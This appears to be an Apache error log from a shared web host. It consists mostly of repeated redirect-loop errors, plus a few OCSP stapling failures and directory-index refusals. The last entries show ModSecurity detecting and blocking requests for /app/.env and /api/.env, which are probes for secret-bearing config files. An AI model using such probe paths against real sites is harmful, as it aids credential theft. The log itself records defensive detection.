[Mon May 11 21:41:27.909989 2026] [core:error] [pid 1590352:tid 1590403] [client 4.193.137.131:2415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:27.910435 2026] [core:error] [pid 1590352:tid 1590403] [client 4.193.137.131:2415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:28.409915 2026] [core:error] [pid 1588898:tid 1588915] [client 4.193.137.131:2398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:28.410494 2026] [core:error] [pid 1588898:tid 1588915] [client 4.193.137.131:2398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:29.079464 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:2423] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:29.079502 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:2423] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:29.590755 2026] [core:error] [pid 1511173:tid 1511183] [client 4.193.137.131:21882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:29.590968 2026] [core:error] [pid 1511173:tid 1511183] [client 4.193.137.131:21882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:30.100999 2026] [core:error] [pid 1511173:tid 1511187] [client 4.193.137.131:2379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:30.101034 2026] [core:error] [pid 1511173:tid 1511187] [client 4.193.137.131:2379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:30.745875 2026] [core:error] [pid 1516058:tid 1516102] [client 4.193.137.131:21824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:30.751781 2026] [core:error] [pid 1516058:tid 1516102] [client 4.193.137.131:21824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:31.245408 2026] [core:error] [pid 1534836:tid 1534870] [client 4.193.137.131:2394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:31.245550 2026] [core:error] [pid 1534836:tid 1534870] [client 4.193.137.131:2394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:31.728341 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:2376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:31.728379 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:2376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:32.228217 2026] [core:error] [pid 1516058:tid 1516096] [client 4.193.137.131:2369] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:32.228256 2026] [core:error] [pid 1516058:tid 1516096] [client 4.193.137.131:2369] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:32.735075 2026] [core:error] [pid 1534836:tid 1534882] [client 4.193.137.131:2370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:32.735114 2026] [core:error] [pid 1534836:tid 1534882] [client 4.193.137.131:2370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:33.403767 2026] [core:error] [pid 1516058:tid 1516104] [client 4.193.137.131:2403] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:33.403816 2026] [core:error] [pid 1516058:tid 1516104] [client 4.193.137.131:2403] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:34.293927 2026] [core:error] [pid 1511173:tid 1511198] [client 4.193.137.131:2414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:34.293962 2026] [core:error] [pid 1511173:tid 1511198] [client 4.193.137.131:2414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:34.772568 2026] [core:error] [pid 1516058:tid 1516099] [client 4.193.137.131:2389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:34.772609 2026] [core:error] [pid 1516058:tid 1516099] [client 4.193.137.131:2389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:35.267698 2026] [core:error] [pid 1588898:tid 1588910] [client 4.193.137.131:2402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:35.267735 2026] [core:error] [pid 1588898:tid 1588910] [client 4.193.137.131:2402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:35.759826 2026] [core:error] [pid 1590352:tid 1590398] [client 4.193.137.131:2378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:35.759862 2026] [core:error] [pid 1590352:tid 1590398] [client 4.193.137.131:2378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:36.283612 2026] [core:error] [pid 1588898:tid 1588918] [client 4.193.137.131:21866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:36.283717 2026] [core:error] [pid 1588898:tid 1588918] [client 4.193.137.131:21866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:36.770843 2026] [core:error] [pid 1590352:tid 1590411] [client 4.193.137.131:2393] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:36.770876 2026] [core:error] [pid 1590352:tid 1590411] [client 4.193.137.131:2393] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:37.279283 2026] [core:error] [pid 1516058:tid 1516094] [client 4.193.137.131:2380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:37.279412 2026] [core:error] [pid 1516058:tid 1516094] [client 4.193.137.131:2380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:37.791579 2026] [core:error] [pid 1511173:tid 1511193] [client 4.193.137.131:2398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:37.791706 2026] [core:error] [pid 1511173:tid 1511193] [client 4.193.137.131:2398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:38.329463 2026] [core:error] [pid 1534836:tid 1534874] [client 4.193.137.131:2416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:38.329499 2026] [core:error] [pid 1534836:tid 1534874] [client 4.193.137.131:2416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:38.815170 2026] [core:error] [pid 1588898:tid 1588908] [client 4.193.137.131:21829] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:38.815210 2026] [core:error] [pid 1588898:tid 1588908] [client 4.193.137.131:21829] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:39.295411 2026] [core:error] [pid 1511173:tid 1511194] [client 4.193.137.131:21845] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:39.295447 2026] [core:error] [pid 1511173:tid 1511194] [client 4.193.137.131:21845] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:39.795019 2026] [core:error] [pid 1534836:tid 1534876] [client 4.193.137.131:2370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:39.795066 2026] [core:error] [pid 1534836:tid 1534876] [client 4.193.137.131:2370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:40.107713 2026] [ssl:error] [pid 1511173:tid 1511200] (EAI 2)Name or service not known: [client 114.119.141.83:43069] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:41:40.108136 2026] [ssl:error] [pid 1511173:tid 1511200] AH01941: stapling_renew_response: responder error
[Mon May 11 21:41:40.296624 2026] [core:error] [pid 1590352:tid 1590394] [client 4.193.137.131:2407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:40.296651 2026] [core:error] [pid 1590352:tid 1590394] [client 4.193.137.131:2407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:40.774407 2026] [core:error] [pid 1588898:tid 1588921] [client 4.193.137.131:2388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:40.774439 2026] [core:error] [pid 1588898:tid 1588921] [client 4.193.137.131:2388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:41.256586 2026] [core:error] [pid 1590352:tid 1590400] [client 4.193.137.131:21833] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:41.256620 2026] [core:error] [pid 1590352:tid 1590400] [client 4.193.137.131:21833] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:41.769526 2026] [core:error] [pid 1590352:tid 1590414] [client 4.193.137.131:2369] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:41.769556 2026] [core:error] [pid 1590352:tid 1590414] [client 4.193.137.131:2369] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:42.253829 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:21844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:42.253859 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:21844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:42.730252 2026] [core:error] [pid 1588898:tid 1588902] [client 4.193.137.131:2430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:42.730281 2026] [core:error] [pid 1588898:tid 1588902] [client 4.193.137.131:2430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:43.207472 2026] [core:error] [pid 1590352:tid 1590415] [client 4.193.137.131:2379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:43.207506 2026] [core:error] [pid 1590352:tid 1590415] [client 4.193.137.131:2379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:43.245420 2026] [ssl:error] [pid 1516058:tid 1516100] (EAI 2)Name or service not known: [client 114.119.141.83:43071] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:41:43.245637 2026] [ssl:error] [pid 1516058:tid 1516100] AH01941: stapling_renew_response: responder error
[Mon May 11 21:41:43.682054 2026] [core:error] [pid 1588898:tid 1588906] [client 4.193.137.131:2383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:43.682083 2026] [core:error] [pid 1588898:tid 1588906] [client 4.193.137.131:2383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:44.162488 2026] [core:error] [pid 1590352:tid 1590409] [client 4.193.137.131:2402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:44.162526 2026] [core:error] [pid 1590352:tid 1590409] [client 4.193.137.131:2402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:44.642812 2026] [core:error] [pid 1534836:tid 1534883] [client 4.193.137.131:2418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:44.642842 2026] [core:error] [pid 1534836:tid 1534883] [client 4.193.137.131:2418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:45.132656 2026] [core:error] [pid 1516058:tid 1516098] [client 4.193.137.131:21871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:45.132687 2026] [core:error] [pid 1516058:tid 1516098] [client 4.193.137.131:21871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:45.612139 2026] [core:error] [pid 1588898:tid 1590048] [client 4.193.137.131:21825] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:45.612179 2026] [core:error] [pid 1588898:tid 1590048] [client 4.193.137.131:21825] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:46.118323 2026] [core:error] [pid 1590352:tid 1590412] [client 4.193.137.131:2391] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:46.118351 2026] [core:error] [pid 1590352:tid 1590412] [client 4.193.137.131:2391] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:46.603057 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:21842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:46.603089 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:21842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:47.100726 2026] [core:error] [pid 1590352:tid 1590399] [client 4.193.137.131:2426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:47.100754 2026] [core:error] [pid 1590352:tid 1590399] [client 4.193.137.131:2426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:47.491659 2026] [ssl:error] [pid 1516058:tid 1516091] (EAI 2)Name or service not known: [client 34.247.34.223:36758] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:41:47.491706 2026] [ssl:error] [pid 1516058:tid 1516091] AH01941: stapling_renew_response: responder error
[Mon May 11 21:41:47.614256 2026] [core:error] [pid 1534836:tid 1534894] [client 4.193.137.131:2978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:47.614292 2026] [core:error] [pid 1534836:tid 1534894] [client 4.193.137.131:2978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:48.105042 2026] [core:error] [pid 1588898:tid 1588901] [client 4.193.137.131:2413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:48.105071 2026] [core:error] [pid 1588898:tid 1588901] [client 4.193.137.131:2413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:48.579869 2026] [core:error] [pid 1590352:tid 1590402] [client 4.193.137.131:2372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:48.579894 2026] [core:error] [pid 1590352:tid 1590402] [client 4.193.137.131:2372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:49.082977 2026] [core:error] [pid 1534836:tid 1534880] [client 4.193.137.131:2381] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:49.083005 2026] [core:error] [pid 1534836:tid 1534880] [client 4.193.137.131:2381] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:49.575546 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:2700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:49.575579 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:2700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:50.052172 2026] [core:error] [pid 1588898:tid 1588916] [client 4.193.137.131:2691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:50.052199 2026] [core:error] [pid 1588898:tid 1588916] [client 4.193.137.131:2691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:50.552719 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:2692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:50.552752 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:2692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:51.051665 2026] [core:error] [pid 1588898:tid 1588903] [client 4.193.137.131:2720] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:41:51.051703 2026] [core:error] [pid 1588898:tid 1588903] [client 4.193.137.131:2720] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:42:22.733864 2026] [autoindex:error] [pid 1590352:tid 1590403] [client 168.138.172.235:54172] AH01276: Cannot serve directory /home/cpcentre/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:42:23.383969 2026] [autoindex:error] [pid 1590352:tid 1590403] [client 168.138.172.235:54172] AH01276: Cannot serve directory /home/cpcentre/public_html/wp-content/themes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:42:23.729035 2026] [autoindex:error] [pid 1590352:tid 1590403] [client 168.138.172.235:54172] AH01276: Cannot serve directory /home/cpcentre/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:42:26.056169 2026] [security2:error] [pid 1516058:tid 1516110] [client 142.248.80.47:1044] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/app/.env"] [unique_id "agIxIiMeXtzav-mi9SzD3AAAANQ"]
[Mon May 11 21:42:26.056514 2026] [security2:error] [pid 1516058:tid 1516110] [client 142.248.80.47:1044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/app/.env"] [unique_id "agIxIiMeXtzav-mi9SzD3AAAANQ"]
[Mon May 11 21:42:26.067484 2026] [security2:error] [pid 1588898:tid 1588919] [client 142.248.80.47:1056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agIxIqFW67LJTsgN3jT8NgAAABQ"]
